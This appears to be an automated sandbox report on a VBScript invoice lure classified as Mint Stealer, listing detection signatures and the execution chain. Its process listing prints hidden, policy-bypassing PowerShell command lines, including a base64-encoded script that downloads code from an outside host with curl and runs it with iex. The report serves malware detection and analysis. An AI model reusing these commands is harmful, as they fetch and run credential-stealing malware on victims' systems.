Windows
Analysis Report
Fattura (5).vbs
Overview
General Information
Detection
Mint Stealer
Score: 100 (range: 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Mint Stealer
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Deletes itself after installation
Found suspicious powershell code related to unpacking or dynamic code loading
Queries Google from non browser process on port 80
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7520, cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", MD5: A47CBE969EA935BDD3AB568BB126BC80)
powershell.exe (PID: 7920, cmdline: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", MD5: 04029E121A0CFA5991749937DD22A1D9)
conhost.exe (PID: 7936, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: 0D698AF330FD17BEE3BF90011D49251D)
cmd.exe (PID: 8080, cmdline: "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat, MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
powershell.exe (PID: 8096, cmdline: powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\eGsnEKfw.ps1", MD5: 04029E121A0CFA5991749937DD22A1D9)
powershell.exe (PID: 8176, cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -execution policy byp ass -Windo wStyle hid den -c "[S ystem.Text .Encoding] ::UTF8.Get String([Sy stem.Conve rt]::FromB ase64Strin g('JEVycm9 yQWN0aW9uU HJlZmVyZW5 jZSA9ICJDb 250aW51ZSI KCiRrMnNoS 1Y5b2JZaTV VV3VSVFFMT 2l0bWFnM2p iID0gJCgta m9pbiAoKDY 1Li45MCkgK yAoOTcuLjE yMikgfCBHZ XQtUmFuZG9 tIC1Db3Vud CA1IHwgJSB 7W2NoYXJdJ F99KSk7CiR SM1RZMGF2M 3dGR2l2Ym1 jSnE4QUViS Th1eVhkZEd oWDNBNjIzM U5nVTdFekh yc0s3dXVQI D0gW2ludF0 oR2V0LURhd GUgLUZvcm1 hdCBISCk7C iRtRTdWT1l mTnlnbnp3S U5BU005WkF xVUtvbmtlM VJQMnhVb1p RdVRGcXhIc WE2bXVjakJ jTHIgPSBba W50XShHZXQ tRGF0ZSAtR m9ybWF0IG1 tKTsKJG1FN 1ZPWWZOeWd uendJTkFTT TlaQXFVS29 ua2UxUlAye FVvWlF1VEZ xeEhxYTZtd WNqQmNMckF kZCA9IDM7C klmICgkbUU 3Vk9ZZk55Z 256d0lOQVN NOVpBcVVLb 25rZTFSUDJ 4VW9aUXVUR nF4SHFhNm1 1Y2pCY0xyI CsgJG1FN1Z PWWZOeWdue ndJTkFTTTl aQXFVS29ua 2UxUlAyeFV vWlF1VEZxe EhxYTZtdWN qQmNMckFkZ CAtZ3QgNTk pIHsKICAgI CRSM1RZMGF 2M3dGR2l2Y m1jSnE4QUV iSTh1eVhkZ EdoWDNBNjI zMU5nVTdFe khyc0s3dXV QID0gJFIzV FkwYXYzd0Z HaXZibWNKc ThBRWJJOHV 5WGRkR2hYM 0E2MjMxTmd VN0V6SHJzS zd1dVAgKyA xOwogICAgJ G1FN1ZPWWZ OeWduendJT kFTTTlaQXF VS29ua2UxU lAyeFVvWlF 1VEZxeEhxY TZtdWNqQmN MciA9ICRtR TdWT1lmTnl nbnp3SU5BU 005WkFxVUt vbmtlMVJQM nhVb1pRdVR GcXhIcWE2b XVjakJjTHI gKyAkbUU3V k9ZZk55Z25 6d0lOQVNNO VpBcVVLb25 rZTFSUDJ4V W9aUXVURnF 4SHFhNm11Y 2pCY0xyQWR kIC0gNjA7C n0gRWxzZSB 7CiAgICAkb UU3Vk9ZZk5 5Z256d0lOQ VNNOVpBcVV Lb25rZTFSU DJ4VW9aUXV URnF4SHFhN m11Y2pCY0x yID0gJG1FN 1ZPWWZOeWd uendJTkFTT TlaQXFVS29 ua2UxUlAye FVvWlF1VEZ xeEhxYTZtd WNqQmNMciA rICRtRTdWT 1lmTnlnbnp 3SU5BU005W kFxVUtvbmt lMVJQMnhVb 1pRdVRGcXh IcWE2bXVja kJjTHJBZGQ 7Cn07CiRSM 1RZMGF2M3d GR2l2Ym1jS nE4QUViSTh 1eVhkZEdoW DNBNjIzMU5 nVTdFekhyc 0s3dXVQID0 gSWYgKFtpb nRdKEdldC1 EYXRlIC1Gb 3JtYXQgSEg pICsgMSAtZ 3QgMjMpIHs iMDAifSBFb HNlIHskUjN UWTBhdjN3R kdpdmJtY0p xOEFFYkk4d XlYZGRHaFg zQTYyMzFOZ 1U3RXpIcnN LN3V1UH07C iRndERRODJ OZjhVeWwwU nJlYTNqNW9 BSTRTS053N nBoOVZmd0t TVnpucEFqN UNhdVBsZDd 
pZ2xia1lpZ 1cgPSAkKC1 qb2luICgoN jUuLjkwKSA rICg5Ny4uM TIyKSB8IEd ldC1SYW5kb 20gLUNvdW5 0IDEyIHwgJ SB7W2NoYXJ dJF99KSk7C iRyZ2VUNEt CeHhLdUdnY UExdjVzd3l wID0gQCIKJ EVycm9yQWN 0aW9uUHJlZ mVyZW5jZSA 9ICJDb250a W51ZSIKY3V ybCAtdXNlY iAiaHR0cDo vL3JpZ3p1d nppM2JuejM udG9wLzEuc GhwP3M9bWl udHMxMyIgf CBpZXg7ClJ lbW92ZS1Jd GVtICJDOlx Vc2Vyc1xQd WJsaWNcRG9 jdW1lbnRzX CQoJGd0RFE 4Mk5mOFV5b DBScmVhM2o 1b0FJNFNLT nc2cGg5VmZ 3S1NWem5wQ Wo1Q2F1UGx kN2lnbGJrW WlnVykucHM xIiAtRm9yY 2UgCiJAOwo KInBvd2Vyc 2hlbGwgLW5 vcHJvZmlsZ SAtZXhlY3V 0aW9ucG9sa WN5IGJ5cGF zcyAtV2luZ G93U3R5bGU gaGlkZGVuI C1jICQoJHJ nZVQ0S0J4e Et1R2dhQTF 2NXN3eXApI iB8IE91dC1 GaWxlIC1Ga WxlUGF0aCA iQzpcVXNlc nNcUHVibGl jXERvY3VtZ